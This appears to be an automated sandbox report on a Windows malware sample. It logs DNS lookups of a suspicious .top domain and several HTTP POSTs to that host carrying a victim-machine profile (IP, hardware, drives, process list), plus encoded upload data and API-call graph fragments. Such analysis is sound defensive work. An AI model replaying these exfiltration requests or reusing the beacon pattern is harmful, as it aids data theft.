                                                          Dec 20, 2024 17:15:23.283862114 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.283904076 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.286597013 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.286696911 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.286782026 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.287509918 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.289741039 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.289797068 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.289926052 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.290195942 CET4971080192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.295006990 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.295052052 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.295062065 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.295072079 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.295072079 CET4971080192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.295142889 CET4971080192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.295169115 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.295178890 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.295209885 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.295229912 CET4971080192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.295336962 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.295346022 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.295353889 CET4971080192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.295357943 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.295396090 CET4971080192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.296149015 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.296190023 CET4971080192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.297305107 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.297314882 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.297354937 CET4971080192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.297368050 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.297517061 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.297873020 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.297899008 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.298002005 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.298011065 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.298078060 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.300432920 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.300479889 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.300488949 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.300544024 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.300582886 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.300714970 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.300723076 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.300730944 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.300827980 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.303462982 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.303663015 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.303673029 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.303740025 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.303837061 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.303848028 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.303961992 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.303971052 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.304133892 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.305862904 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.305892944 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.306029081 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.306124926 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.306173086 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.306183100 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.306260109 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.320389032 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.320545912 CET4971080192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.321149111 CET4971080192.168.2.7185.121.15.192
                                                          Dec 20, 2024 17:15:23.331167936 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.333754063 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.375921965 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403309107 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403364897 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403374910 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403485060 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403496027 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.403505087 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.412703037 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.412724018 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.412934065 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.412944078 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413048029 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413187027 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413197041 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413228035 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413342953 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413357019 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.413404942 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415679932 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415781021 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415791988 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415808916 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415852070 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415862083 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415921926 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415958881 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.415968895 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418730021 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418764114 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418773890 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418858051 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418868065 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418900013 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418910027 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.418960094 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.419034004 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422204018 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422215939 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422229052 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422239065 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422264099 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422274113 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422333956 CET8049710185.121.15.192192.168.2.7
                                                          Dec 20, 2024 17:15:23.422344923 CET8049710185.121.15.192192.168.2.7
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 20, 2024 17:15:14.730369091 CET | 192.168.2.7 | 1.1.1.1 | 0x8b6b | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 17:15:14.730541945 CET | 192.168.2.7 | 1.1.1.1 | 0x5373 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false |
| Dec 20, 2024 17:15:17.938627958 CET | 192.168.2.7 | 1.1.1.1 | 0x33 | Standard query (0) | home.fivetk5vt.top | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 17:15:17.938708067 CET | 192.168.2.7 | 1.1.1.1 | 0xe340 | Standard query (0) | home.fivetk5vt.top | 28 | IN (0x0001) | false |
| Dec 20, 2024 17:15:19.966170073 CET | 192.168.2.7 | 1.1.1.1 | 0x3264 | Standard query (0) | home.fivetk5vt.top | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 17:15:19.966285944 CET | 192.168.2.7 | 1.1.1.1 | 0x93f9 | Standard query (0) | home.fivetk5vt.top | 28 | IN (0x0001) | false |
| Dec 20, 2024 17:15:21.763134003 CET | 192.168.2.7 | 1.1.1.1 | 0x6d61 | Standard query (0) | home.fivetk5vt.top | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 17:15:21.763195992 CET | 192.168.2.7 | 1.1.1.1 | 0xb60e | Standard query (0) | home.fivetk5vt.top | 28 | IN (0x0001) | false |
| Dec 20, 2024 17:15:23.511454105 CET | 192.168.2.7 | 1.1.1.1 | 0xf238 | Standard query (0) | home.fivetk5vt.top | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 17:15:23.511518002 CET | 192.168.2.7 | 1.1.1.1 | 0xc0a1 | Standard query (0) | home.fivetk5vt.top | 28 | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 20, 2024 17:15:14.868910074 CET | 1.1.1.1 | 192.168.2.7 | 0x8b6b | No error (0) | httpbin.org | | 98.85.100.80 | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 17:15:14.868910074 CET | 1.1.1.1 | 192.168.2.7 | 0x8b6b | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 17:15:18.234877110 CET | 1.1.1.1 | 192.168.2.7 | 0x33 | No error (0) | home.fivetk5vt.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 17:15:20.104475975 CET | 1.1.1.1 | 192.168.2.7 | 0x3264 | No error (0) | home.fivetk5vt.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 17:15:21.903438091 CET | 1.1.1.1 | 192.168.2.7 | 0x6d61 | No error (0) | home.fivetk5vt.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false |
| Dec 20, 2024 17:15:23.652947903 CET | 1.1.1.1 | 192.168.2.7 | 0xf238 | No error (0) | home.fivetk5vt.top | | 185.121.15.192 | A (IP address) | IN (0x0001) | false |
                                                          • httpbin.org
                                                          • home.fivetk5vt.top
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.7 | 49703 | 185.121.15.192 | 80 | 7672 | C:\Users\user\Desktop\28PCC9oa8s.exe |

Timestamp: Dec 20, 2024 17:15:18.462779999 CET
Bytes transferred: 12360
Direction: OUT
Data:
POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                          Host: home.fivetk5vt.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 444875
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711316", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.7 | 49704 | 185.121.15.192 | 80 | 7672 | C:\Users\user\Desktop\28PCC9oa8s.exe |

Timestamp: Dec 20, 2024 17:15:20.228579998 CET
Bytes transferred: 12360
Direction: OUT
Data:
POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                          Host: home.fivetk5vt.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 444875
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711316", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.7 | 49710 | 185.121.15.192 | 80 | 7672 | C:\Users\user\Desktop\28PCC9oa8s.exe |

Timestamp: Dec 20, 2024 17:15:22.029805899 CET
Bytes transferred: 12360
Direction: OUT
Data:
POST /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                          Host: home.fivetk5vt.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 444875
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734711316", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                          Data Ascii: C3xQo5BQ49zrh\/OJZJnlH+06Of43E4fEyzGFfEzw8cRNzxdXG1cRisRRxToQrU\/rOLhgsxxFGFWjl2Pq0PQ5LGZR8qb0+n1z1I7fWoTE6nDKV+oqez1G1uoxNp91bXUJxiW1niuIz6YkiZlOR79Pap7zVYbO0mub\/LwW6F5GCljgcAKqgszMxCoo5ZiFHJr7b93ye19ovZ8rnz80eTlSu5c23Kkm73tufnf+0e0VLkn7RyUO
                                                          Dec 20, 2024 17:15:22.164208889 CET2472OUTData Raw: 46 5a 74 44 4a 5c 2f 62 5a 2b 47 4e 39 38 57 76 67 6e 6f 36 79 66 44 33 34 4a 2b 50 37 36 78 76 33 38 4a 61 62 65 79 65 4c 4e 51 31 79 78 30 6a 77 74 6f 46 31 41 78 54 78 46 66 36 66 6a 55 4b 5c 2f 48 65 4e 75 4f 5c 2f 6f 5c 2f 63 65 5a 46 53 34
                                                          Data Ascii: FZtDJ\/bZ+GN98Wvgno6yfD34J+P76xv38JabeyeLNQ1yx0jwtoF1AxTxFf6fjUK\/HeNuO\/o\/ceZFS4f4v4mybOsmzCnlGdUcBh8fnVGtX+s5picpympB5HLD5isRWzfDYvLoYFTjiHjqFXC1sN7Wm4L988N\/Df6Ufh3xHiuKfD7gviPJM+yalmuV4vM62V5DiqGDwyoZbPM3VhxDSxeV\/U\/q2Z5ZWWZOlLDOhjMPXw2K
                                                          Dec 20, 2024 17:15:22.280625105 CET2472OUTData Raw: 35 4f 33 34 5c 2f 77 42 4b 6e 62 6f 76 30 5c 2f 6f 4b 5a 57 5a 30 45 63 6e 62 38 66 36 56 48 56 69 6f 32 62 73 50 78 50 38 41 68 51 62 65 5c 2f 77 44 33 66 78 4b 64 51 76 38 41 65 50 34 66 79 46 58 57 42 62 38 38 31 48 73 50 74 5c 2f 6e 38 4b 44
                                                          Data Ascii: 5O34\/wBKnbov0\/oKZWZ0Ecnb8f6VHVio2bsPxP8AhQbe\/wD3fxKdQv8AeP4fyFXWBb881HsPt\/n8KDenU\/Wztv8A1\/XnUqOX75\/z3NWcff75\/n1\/rVb\/AJaf5\/u1t7\/938Sxkn3fv\/5\/M\/4\/hxUP578\/59sY\/wA4qeXv\/u\/41B3\/AL\/58fzFYnQD9fw\/qarv1\/Cpagk\/74\/z\/n396DoK7B\/
                                                          Dec 20, 2024 17:15:22.280704975 CET7416OUTData Raw: 33 58 61 5c 2f 77 43 38 65 50 70 7a 2b 48 70 2b 4a 39 2b 39 4d 32 76 74 68 2b 51 6f 5c 2f 77 44 71 70 5a 50 5c 2f 41 47 31 5c 2f 6c 5c 2f 6e 69 72 52 56 5c 2f 4d 54 66 35 6e 2b 75 5c 2f 35 5a 79 5c 2f 75 50 38 41 36 31 52 37 58 33 37 33 2b 51 2b
                                                          Data Ascii: 3Xa\/wC8ePpz+Hp+J9+9M2vth+Qo\/wDqpZP\/AG1\/l\/nirRV\/MTf5n+u\/5Zy\/uP8A61R7X373+Q+d5X7z\/lr\/AC+nX+dHs\/P8P+CAzy\/3cKM5dP8ASPN\/Kj5AqPM\/l\/8APXt\/o\/8An8fyok3yK6fc69\/8jnn8KZ5j8On2fyfXyv3H\/Xraf5OazOghb729EkTy\/wBP8\/57UpR\/4E2eZ\/y09x\/ntUv+


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.7 | 49716 | 185.121.15.192 | 80 | 7672 | C:\Users\user\Desktop\28PCC9oa8s.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 20, 2024 17:15:23.775986910 CET | 87 | OUT | GET /hLfzXsaqNtoEGyaUtOMJ1734514745 HTTP/1.1
                                                          Host: home.fivetk5vt.top
                                                          Accept: */*
                                                          Dec 20, 2024 17:15:25.072978020 CET | 212 | IN | HTTP/1.0 503 Service Unavailable
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.7 | 49701 | 98.85.100.80 | 443 | 7672 | C:\Users\user\Desktop\28PCC9oa8s.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-20 16:15:16 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                          Host: httpbin.org
                                                          Accept: */*
                                                          2024-12-20 16:15:16 UTC | 224 | IN | HTTP/1.1 200 OK
                                                          Date: Fri, 20 Dec 2024 16:15:16 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 31
                                                          Connection: close
                                                          Server: gunicorn/19.9.0
                                                          Access-Control-Allow-Origin: *
                                                          Access-Control-Allow-Credentials: true
                                                          2024-12-20 16:15:16 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                          Data Ascii: { "origin": "8.46.123.189"}



                                                          Target ID:0
                                                          Start time:11:15:12
                                                          Start date:20/12/2024
                                                          Path:C:\Users\user\Desktop\28PCC9oa8s.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\28PCC9oa8s.exe"
                                                          Imagebase:0xb0000
                                                          File size:4'450'816 bytes
                                                          MD5 hash:8A549F15D1418FB4207AADB4BA813A36
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:11:15:24
                                                          Start date:20/12/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1144
                                                          Imagebase:0xa80000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:0.1%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:44
                                                            Total number of Limit Nodes:2
                                                            execution_graph 12846 6db0ad1 12847 6db0af1 12846->12847 12852 6db0bef 12847->12852 12853 6db0bfe GetLogicalDrives 12852->12853 12855 6db0d84 12853->12855 12956 6db0bf9 12957 6db0c21 GetLogicalDrives 12956->12957 12959 6db0d84 12957->12959 12838 6e0035b 12839 6e0035e Process32FirstW 12838->12839 12841 6e0037a 12838->12841 12839->12841 13097 6db099d 13098 6db0999 13097->13098 13098->13097 13099 6db0bef GetLogicalDrives 13098->13099 13100 6db0be4 13099->13100 13101 6db0d5f GetLogicalDrives 13100->13101 13102 6db0d84 13101->13102 12833 6db0d92 12834 6db0d5a GetLogicalDrives 12833->12834 12835 6db0d58 12833->12835 12837 6db0d84 12834->12837 12836 6db0d5f GetLogicalDrives 12835->12836 12835->12837 12836->12837 13107 6db098b 13108 6db0999 13107->13108 13109 6db0bef GetLogicalDrives 13108->13109 13110 6db0be4 GetLogicalDrives 13109->13110 13112 6db0d84 13110->13112 13054 6e0003e 13055 6e0004d Process32FirstW 13054->13055 13057 6e0037a 13055->13057 13058 6e00000 13059 6e00012 13058->13059 13064 6e00033 13059->13064 13065 6e00038 Process32FirstW 13064->13065 13067 6e0037a 13065->13067 12966 6db0bbd 12967 6db0bca 12966->12967 12969 6db0be4 GetLogicalDrives 12966->12969 12968 6db0bef GetLogicalDrives 12967->12968 12968->12969 12971 6db0d84 12969->12971 13068 6e00007 13069 6e00033 Process32FirstW 13068->13069 13070 6e00022 Process32FirstW 13068->13070 13069->13070 13072 6e0037a 13070->13072
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: dc8de665a920d87a6c480c8ae178a15b8944de78e17bef609367a507f551ed30
                                                            • Instruction ID: 594245a7051acb0c118118be355df07e84f8d939bd35ac416633e6510b2ffcde
                                                            • Opcode Fuzzy Hash: dc8de665a920d87a6c480c8ae178a15b8944de78e17bef609367a507f551ed30
                                                            • Instruction Fuzzy Hash: CA51E1F740C311FDB7C296855B50AFA6B7EAA9B33C7308522F4CBA5602E294CB4951F1

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR$X$`
                                                            • API String ID: 0-3824400993
                                                            • Opcode ID: d0c14339e01008c837da72b7d6fe04bfaafb6fd077760e576bbb19fb72ec618a
                                                            • Instruction ID: 02555cce46b15117d05b66c3566d57425d8eac58e405a42c0fb0bf8e00b010e8
                                                            • Opcode Fuzzy Hash: d0c14339e01008c837da72b7d6fe04bfaafb6fd077760e576bbb19fb72ec618a
                                                            • Instruction Fuzzy Hash: 34A103F780C310BEF78196815B44BFA7B7EE7D6339F308426F487A5542E3A88A4945B1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 113 6db09ec-6db09fa 114 6db0999-6db09a5 113->114 115 6db09fc 113->115 118 6db09f3-6db09fc 114->118 119 6db09a7-6db09cb 114->119 116 6db09fe-6db0d59 call 6db0bef 115->116 161 6db0d5f-6db0d79 GetLogicalDrives 116->161 118->116 119->113 162 6db0d84-6db0dd0 call 6db0ddc 161->162 166 6db0dd5-6db0de5 call 6db0deb 162->166 169 6db0de7-6db0de9 166->169 170 6db0dc6-6db0dcf 166->170 170->166 171 6db0dd0 call 6db0ddc 170->171 171->166
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: a8310e4a57269b4799302c18dfc24c61430abb293e4fc4dee6bbb4d56c415afa
                                                            • Instruction ID: 65063077e9290698e43ca31c9dc321277e78413f537df15589629158e747cbdb
                                                            • Opcode Fuzzy Hash: a8310e4a57269b4799302c18dfc24c61430abb293e4fc4dee6bbb4d56c415afa
                                                            • Instruction Fuzzy Hash: 1F51F2EB54C111FD738291856B14EFB6B7EE5C2730730A83AF483C664AE6E48E4A51B1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
